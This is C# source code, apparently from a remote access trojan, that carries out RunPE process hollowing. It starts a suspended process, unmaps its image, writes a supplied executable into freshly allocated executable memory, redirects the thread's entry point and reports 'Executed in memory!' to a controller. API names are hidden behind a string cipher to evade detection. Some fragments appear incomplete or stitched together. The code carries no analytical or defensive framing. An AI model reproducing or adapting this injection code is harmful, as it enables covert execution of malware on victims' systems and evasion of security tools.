public IntPtr AllocMem(IntPtr hProc, uint size, int allocType, int protection)
{
var args = new object[5];
args[0] = hProc;
args[2] = size;
args[3] = allocType;
args[4] = protection;
return((IntPtr)VirtualAllocEx.Invoke(null, args));
}
public static void Initialize()
{
//DynamicCreateProcess = Core.CreateAPI<CreateProcess>(Core.KERNEL32, StringCipher.Decrypt("[CreateProcessW]", Config.MUTEX));
DynamicGetThreadContext = Core.CreateAPI <GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[GetThreadContext]", Config.MUTEX));
DynamicNtUnmapViewOfSection = Core.CreateAPI <NtUnmapViewOfSection>("ntdll", StringCipher.Decrypt("[NtUnmapViewOfSection]", Config.MUTEX));
DynamicReadProcessMemory = Core.CreateAPI <ReadProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[ReadProcessMemory]", Config.MUTEX));
DynamicResumeThread = Core.CreateAPI <ResumeThread>(Core.KERNEL32, StringCipher.Decrypt("[ResumeThread]", Config.MUTEX));
DynamicSetThreadContext = Core.CreateAPI <SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[SetThreadContext]", Config.MUTEX));
DynamicVirtualAllocEx = Core.CreateAPI <VirtualAllocEx>(Core.KERNEL32, StringCipher.Decrypt("[VirtualAllocEx]", Config.MUTEX));
DynamicWow64GetThreadContext = Core.CreateAPI <Wow64GetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64GetThreadContext]", Config.MUTEX));
DynamicWow64SetThreadContext = Core.CreateAPI <Wow64SetThreadContext>(Core.KERNEL32, StringCipher.Decrypt("[Wow64SetThreadContext]", Config.MUTEX));
DynamicWriteProcessMemory = Core.CreateAPI <WriteProcessMemory>(Core.KERNEL32, StringCipher.Decrypt("[WriteProcessMemory]", Config.MUTEX));
}
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
{
CreateProcessA createProc = makeAPI <CreateProcessA>("kernel32", "CreateProcessA");
RPM readProcessMemory = makeAPI <RPM>("kernel32", "ReadProcessMemory");
ReadProcessMemory2 readProcessMemory2 = makeAPI <ReadProcessMemory2>("kernel32", "ReadProcessMemory");
WriteProcessMemory writeProcessMemory = makeAPI <WriteProcessMemory>("kernel32", "WriteProcessMemory");
GetThreadContext getThreadContext = makeAPI <GetThreadContext>("kernel32", "GetThreadContext");
SetThreadContext setThreadContext = makeAPI <SetThreadContext>("kernel32", "SetThreadContext");
NtUnmapViewOfSection ntUnmapViewOfSection = makeAPI <NtUnmapViewOfSection>("ntdll", "NtUnmapViewOfSection");
VirtualAllocEx virtualAllocEx = makeAPI <VirtualAllocEx>("kernel32", "VirtualAllocEx");
ResumeThread resumeThread = makeAPI <ResumeThread>("kernel32", "ResumeThread");
int ReadWrite = 0;
string pPath = path;//Application.ExecutablePath;
string QuotedPath = string.Format("\"{0}\"", pPath);
STARTUP_INFORMATION SI = new STARTUP_INFORMATION();
PROCESS_INFORMATION PI = new PROCESS_INFORMATION();
SI.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(STARTUP_INFORMATION)));
try
{
if (string.IsNullOrEmpty(cmd))
{
if (!createProc(pPath, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref SI, ref PI))
{
throw new Exception();
}
}
else
{
QuotedPath = QuotedPath + " " + cmd;
if (!createProc(pPath, QuotedPath, IntPtr.Zero, IntPtr.Zero, false, 4, IntPtr.Zero, null, ref SI, ref PI))
{
throw new Exception();
}
}
int FileAddress = BitConverter.ToInt32(data, 60);
int ImageBase = BitConverter.ToInt32(data, FileAddress + 52);
int[] Context = new int[179];
Context[0] = 65538;
if (!getThreadContext(PI.ThreadHandle, Context))
{
throw new Exception();
}
int Ebx = Context[41];
int BaseAddress = 0;
if (!readProcessMemory(PI.ProcessHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
{
throw new Exception();
}
if (ImageBase == BaseAddress)
{
if (!(ntUnmapViewOfSection(PI.ProcessHandle, BaseAddress) == 0))
{
throw new Exception();
}
}
int SizeOfImage = BitConverter.ToInt32(data, FileAddress + 80);
int SizeOfHeaders = BitConverter.ToInt32(data, FileAddress + 84);
bool AllowOverride = false;
int NewImageBase = virtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64);
//This is the only way to execute under certain conditions. However, it may show
//an application error probably because things aren't being relocated properly.
if (!compatible && NewImageBase == 0)
{
AllowOverride = true;
NewImageBase = virtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64);
}
if (NewImageBase == 0)
{
throw new Exception();
}
if (!writeProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ref ReadWrite))
{
throw new Exception();
}
int SectionOffset = FileAddress + 248;
short NumberOfSections = BitConverter.ToInt16(data, FileAddress + 6);
for (int I = 0; I <= NumberOfSections - 1; I++)
{
int VirtualAddress = BitConverter.ToInt32(data, SectionOffset + 12);
int SizeOfRawData = BitConverter.ToInt32(data, SectionOffset + 16);
int PointerToRawData = BitConverter.ToInt32(data, SectionOffset + 20);
if (!(SizeOfRawData == 0))
{
byte[] SectionData = new byte[SizeOfRawData];
Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length);
if (!writeProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
{
throw new Exception();
}
}
SectionOffset += 40;
}
byte[] PointerData = BitConverter.GetBytes(NewImageBase);
if (!writeProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
{
throw new Exception();
}
int AddressOfEntryPoint = BitConverter.ToInt32(data, FileAddress + 40);
if (AllowOverride)
{
NewImageBase = ImageBase;
}
Context[44] = NewImageBase + AddressOfEntryPoint;
if (!setThreadContext(PI.ThreadHandle, Context))
{
throw new Exception();
}
if (resumeThread(PI.ThreadHandle) == -1)
{
throw new Exception();
}
// create a new thread
new Packets.ClientPackets.Status("Executed in memory!").Execute(current);
}
catch (Exception ex)
{
new Packets.ClientPackets.Status("RunPE Error: " + ex.Message).Execute(current);
Process P = Process.GetProcessById(Convert.ToInt32(PI.ProcessId));
if (P != null)
{
P.Kill();
}
return(false);
}
return(true);
}